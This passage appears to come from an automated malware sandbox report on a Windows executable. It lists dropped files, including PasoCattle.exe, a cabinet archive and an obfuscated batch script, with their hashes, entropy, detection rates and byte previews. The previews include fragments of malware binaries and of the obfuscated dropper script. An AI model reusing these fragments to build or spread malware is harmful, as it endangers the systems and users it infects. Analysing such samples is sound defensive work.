                                                                                                                                                                      Preview:.KillTimer.7.PostQuitMessage...SetFocus....MoveWindow....DefWindowProcW....MessageBoxW...GetUserObjectSecurity.-.OpenWindowStationW..h.GetProcessWindowStation...SetProcessWindowStation.(.OpenDesktopW..N.CloseWindowStation..J.CloseDesktop....SetUserObjectSecurity...GetWindowRect.6.PostMessageW....MapVirtualKeyW..&.GetDlgCtrlID..d.GetParent...GetClassNameW.;.CharUpperBuffW....EnumChildWindows..{.SendMessageTimeoutW.m.ScreenToClient....GetWindowTextW..,.GetFocus....AttachThreadInput...GetWindowThreadProcessId..!.GetDC.e.ReleaseDC...GetWindowLongW....InvalidateRect....EnableWindow....IsWindowVisible...IsWindowEnabled...IsWindow..#.GetDesktopWindow....EnumWindows...DestroyWindow.K.GetMenu...GetClientRect...BeginPaint....EndPaint..U.CopyRect....SetWindowTextW..'.GetDlgItem..s.SendDlgItemMessageW...EndDialog...MessageBeep...DialogBoxParamW...LoadStringW.!.VkKeyScanW..=.GetKeyState.B.GetKeyboardState....SetKeyboardState....GetAsyncKeyState..v.SendInput.0.keybd_event...SystemParametersInfoW...F
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):59392
                                                                                                                                                                      Entropy (8bit):7.997035686695416
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:F5ORWtjA85b/PQW6wzxYtMbs8VKKXsgN1yFi3eb7:Op85T6tIDVKKXZMoeb7
                                                                                                                                                                      MD5:BF1A63801FCE643D91670984E50AA26C
                                                                                                                                                                      SHA1:96CC6E514ED73B0F0816884E6019F3F3C31F6A80
                                                                                                                                                                      SHA-256:96E885D5F09D9B01BBBB20C5DA4005E84683F65EE061EB2D22F41DA96A1A48A0
                                                                                                                                                                      SHA-512:D741447E64E376442A4FBEE480A94C494219292BB70DF6A346C5244C12F647BDC074F13F53A0FC32202C1D8D6A37C7BAA9CC0E750020492B99781D9CEEE3F943
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.O.L..Q.HP.....g'V.,3?...p7;6}...9...<.B..C.f.JK.HF. .....7.C...p.o....:@....[v%.k.6.e..D.Y.(.p....t.[... ../l...$.6......U.6..Ye.Jw}h...i......l....P..s. .;..Z..O..|....4...{.U.-..s.:Hbs!E.C...Md.x.b %....N.r.-1....3.z.^v..m.a.5.j........jy.dq..D...z...).74..b..Y..x....p.c@.z{....&.D..j.{..........`...^.G........Rpgf..+3........%.i.......A....wde......I1*.3........Lq.fe...Jdr.+./.,7......v....}.Fr.P.......5*cEZ.p.@.....#B.....L...Td......c.....X...........92 N..zn.N.....g.....CMG...:.X......i...MW....T>}%C....>..@.S.+.&.R.......a....D.~......."...... ...z....[.!....r..C.D..1[.}S..zC....C..gv..3../q...S........(..9*M./[.X..t.w.Y..l.T'...$..L.>n........I:\.".i..D(..w....}7;.....2.n!X..l.........#.........D.QA...0p.e$/..7 .{/..H{3..i.U@....ye.....]..o....b.]+......i.$..$..^siT:..{....s...).p..G.C.8..J:.?...@"D.JY=.+["kSq..M..."?.`..r]......|QT~dB..c..O..$.C..*.l...z..1.......m.W......k..`......HY2...Z..]....... ....>f...
                                                                                                                                                                      Process:C:\Users\user\Desktop\vUcZzNWkKc.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1062983
                                                                                                                                                                      Entropy (8bit):7.969270980145046
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:00giFMExCeGp6bA+2lC/S9zD0upW2+IHxb7A8G5jMVTn1Xx1MwT6/OkwyR4UzU+J:/ieH66juI80CT1DMa4LwxIM9HM/U1OK
                                                                                                                                                                      MD5:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                      SHA1:DDFBF23CBA3ADC0BCAD33162D1BDBEE8CCD12294
                                                                                                                                                                      SHA-256:A7B3B6CA09E92530EF0BD156B0C2C0213E957129BFB83B8A99D2387932BB2CA5
                                                                                                                                                                      SHA-512:AF6391847FF626FF88FF0583ADDE9536EFF25026ACBC0D0165CE27286A8F145CBB0B5059A294D7A14CB497C60B96E9A5DE88D41A3EE6A339FDB554DE51790F0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@.................................t.....@.................................@..........."u..............8+...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc..."u.......v..................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):133120
                                                                                                                                                                      Entropy (8bit):6.593902201612224
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:2+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9cob:2mVnjphfhnvO5bLezWWt/Dd314V14Zgz
                                                                                                                                                                      MD5:998B4B6FEEE76BEB9CA721DCD2B8A4E0
                                                                                                                                                                      SHA1:6556CA455B7F7B3B36F5A703746B17D2D662F82B
                                                                                                                                                                      SHA-256:A3718216E2D86886D768FDE1FE869B9F84FA96309ADC8D83CAF1F17B939F76BF
                                                                                                                                                                      SHA-512:A8E92A0CF4CA465313BFE27D860F956F3777B3202A8B1FDFB03DB4AAAD567F3546C525F40D85414D04806D964B650637846FD1F7CCA6736B8C8E327B342C3617
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..|....T..t..R83.C.Z..|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.|$..y..v..I.......;.u.....2.....!............M..
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):73728
                                                                                                                                                                      Entropy (8bit):7.9975626227798315
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
                                                                                                                                                                      MD5:832042466014761981CDAF193F0E7041
                                                                                                                                                                      SHA1:301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
                                                                                                                                                                      SHA-256:FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
                                                                                                                                                                      SHA-512:2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q..*..#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..*E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....|.
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):100352
                                                                                                                                                                      Entropy (8bit):7.9982884825197775
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
                                                                                                                                                                      MD5:CD00C53F92FBED3C8947B7205A4247ED
                                                                                                                                                                      SHA1:87D5486B7EFD98DCC92B4393D20D39D12CB6487E
                                                                                                                                                                      SHA-256:EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
                                                                                                                                                                      SHA-512:D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../.............*...$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.*z...l.k.EQ..*+.=.....E]T.\Y.?.C..'*.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......|...U?].....D..f...*.D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D |.&...*f|n.......yq....#|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):88064
                                                                                                                                                                      Entropy (8bit):5.844749716437728
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
                                                                                                                                                                      MD5:7A1D29A789B8F5CA0F4186AA1DBC3BC2
                                                                                                                                                                      SHA1:A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
                                                                                                                                                                      SHA-256:A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
                                                                                                                                                                      SHA-512:AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):488808
                                                                                                                                                                      Entropy (8bit):7.998475465922649
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
                                                                                                                                                                      MD5:97942C5C8DFF98863EFC71FC15CE0257
                                                                                                                                                                      SHA1:14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
                                                                                                                                                                      SHA-256:B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
                                                                                                                                                                      SHA-512:7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....
                                                                                                                                                                      Process:C:\Users\user\Desktop\vUcZzNWkKc.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6851208
                                                                                                                                                                      Entropy (8bit):6.451509958428788
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
                                                                                                                                                                      MD5:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                      SHA1:4F1E624BCC030E44722DE26B72C8156BF57E14E8
                                                                                                                                                                      SHA-256:73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
                                                                                                                                                                      SHA-512:6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):152576
                                                                                                                                                                      Entropy (8bit):6.433958275406592
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
                                                                                                                                                                      MD5:D49F624EA007E69AFE1163955DDBA1BB
                                                                                                                                                                      SHA1:EE35A9CEAB1F6A40694B26094FDC7727658293D2
                                                                                                                                                                      SHA-256:4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
                                                                                                                                                                      SHA-512:63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):25405
                                                                                                                                                                      Entropy (8bit):5.118149909201556
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                      MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                      SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                      SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                      SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):25405
                                                                                                                                                                      Entropy (8bit):5.118149909201556
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                      MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                      SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                      SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                      SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):148480
                                                                                                                                                                      Entropy (8bit):6.695251861322664
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
                                                                                                                                                                      MD5:A1E25E38AD59F032B7717CC6E5E00609
                                                                                                                                                                      SHA1:F7E7D770656E25F73BE807AC53F49776810099D5
                                                                                                                                                                      SHA-256:A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
                                                                                                                                                                      SHA-512:4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):79872
                                                                                                                                                                      Entropy (8bit):7.997576222410487
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
                                                                                                                                                                      MD5:6ECD89B15DFAEE100B13F894C76F9CEE
                                                                                                                                                                      SHA1:CFF0D1262CAD22201D25B331AFD9EB882865767F
                                                                                                                                                                      SHA-256:73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
                                                                                                                                                                      SHA-512:6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):7.979658742891777
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:vUcZzNWkKc.exe
                                                                                                                                                                      File size:7'088'640 bytes
                                                                                                                                                                      MD5:2882ead03a58608f2f73c66b861299a3
                                                                                                                                                                      SHA1:6a8adde3d6ceda99d430611a3e06a8bc6ec9bfe0
                                                                                                                                                                      SHA256:5866e752f869f91e6084a50c2ee65991de91b9e63f4ea9d1ac9bce9b4123a77d
                                                                                                                                                                      SHA512:1d14a5f1b0dcd99408fee52bc2a43f96f18fd27c345b233ffa0308f516155008ce91346c77e30f0456f7c9b40563c9d0521317ea4a60ac83abd4cd07271c57de
                                                                                                                                                                      SSDEEP:196608:bQPvEGHXe3iM4Jsa0S8yUf5H2RvsVhblD:snESXe3iSa8yUfNuEHbN
